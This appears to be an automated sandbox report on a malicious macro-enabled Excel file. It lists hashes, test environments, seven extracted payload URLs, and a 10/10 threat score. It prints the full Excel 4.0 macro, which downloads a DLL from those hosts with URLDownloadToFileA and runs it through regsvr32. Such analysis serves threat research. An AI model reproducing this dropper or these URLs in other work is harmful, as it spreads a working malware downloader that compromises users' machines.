General
-
Target
bf63b9fb17e0a41c5279cec6ab8c9d9dbb6fd7aaf6465e861cc005c1ea5aecbe
-
Size
32KB
-
Sample
241120-zmxnsatenp
-
MD5
71e22e31c9e47ca22ea80518a81e5767
-
SHA1
b767ffe76201d052627c9a1f3d9f712f17783c53
-
SHA256
bf63b9fb17e0a41c5279cec6ab8c9d9dbb6fd7aaf6465e861cc005c1ea5aecbe
-
SHA512
e62df2f1875982f115cd49e681f5f555138e5db1eee911b1dd3c9846ad272f8fbc9ede72ebbc063d60f141f465173e46a91809b1b9ba5cd9cfe5bba331b06ff9
-
SSDEEP
768:cjf8WFhN7beEizXT2LxdFfPdkqstJVE6D:2EsTXrgXUndkq8E6D
Behavioral task
behavioral1
Sample
bf63b9fb17e0a41c5279cec6ab8c9d9dbb6fd7aaf6465e861cc005c1ea5aecbe.xlsm
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
bf63b9fb17e0a41c5279cec6ab8c9d9dbb6fd7aaf6465e861cc005c1ea5aecbe.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
https://www.alejandrovillar.com/MSL/eKDWjpa4OHRxpysOTFe/
https://alejandrastamateas.com/web/ZxA3zHwsH3r/
https://alexetaurore.com/wanted/pfFtzaJovICU81kfuUp/
http://ayursoukhya.org/wp-includes/XI35qPGHvszZ1u/
http://balibuli.hu/cgi-bin/WDDM0VHSK4VcOFmU/
https://aldibiki.com/prettyPhoto/gLFRzQV0VunO/
https://al-brik.com/vb-w/U/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.alejandrovillar.com/MSL/eKDWjpa4OHRxpysOTFe/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alejandrastamateas.com/web/ZxA3zHwsH3r/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alexetaurore.com/wanted/pfFtzaJovICU81kfuUp/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ayursoukhya.org/wp-includes/XI35qPGHvszZ1u/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://balibuli.hu/cgi-bin/WDDM0VHSK4VcOFmU/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aldibiki.com/prettyPhoto/gLFRzQV0VunO/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://al-brik.com/vb-w/U/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()
Extracted
https://www.alejandrovillar.com/MSL/eKDWjpa4OHRxpysOTFe/
https://alejandrastamateas.com/web/ZxA3zHwsH3r/
https://alexetaurore.com/wanted/pfFtzaJovICU81kfuUp/
http://ayursoukhya.org/wp-includes/XI35qPGHvszZ1u/
http://balibuli.hu/cgi-bin/WDDM0VHSK4VcOFmU/
https://aldibiki.com/prettyPhoto/gLFRzQV0VunO/
https://al-brik.com/vb-w/U/
Extracted
https://www.alejandrovillar.com/MSL/eKDWjpa4OHRxpysOTFe/
https://alejandrastamateas.com/web/ZxA3zHwsH3r/
Targets
-
-
Target
bf63b9fb17e0a41c5279cec6ab8c9d9dbb6fd7aaf6465e861cc005c1ea5aecbe
-
Size
32KB
-
MD5
71e22e31c9e47ca22ea80518a81e5767
-
SHA1
b767ffe76201d052627c9a1f3d9f712f17783c53
-
SHA256
bf63b9fb17e0a41c5279cec6ab8c9d9dbb6fd7aaf6465e861cc005c1ea5aecbe
-
SHA512
e62df2f1875982f115cd49e681f5f555138e5db1eee911b1dd3c9846ad272f8fbc9ede72ebbc063d60f141f465173e46a91809b1b9ba5cd9cfe5bba331b06ff9
-
SSDEEP
768:cjf8WFhN7beEizXT2LxdFfPdkqstJVE6D:2EsTXrgXUndkq8E6D
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-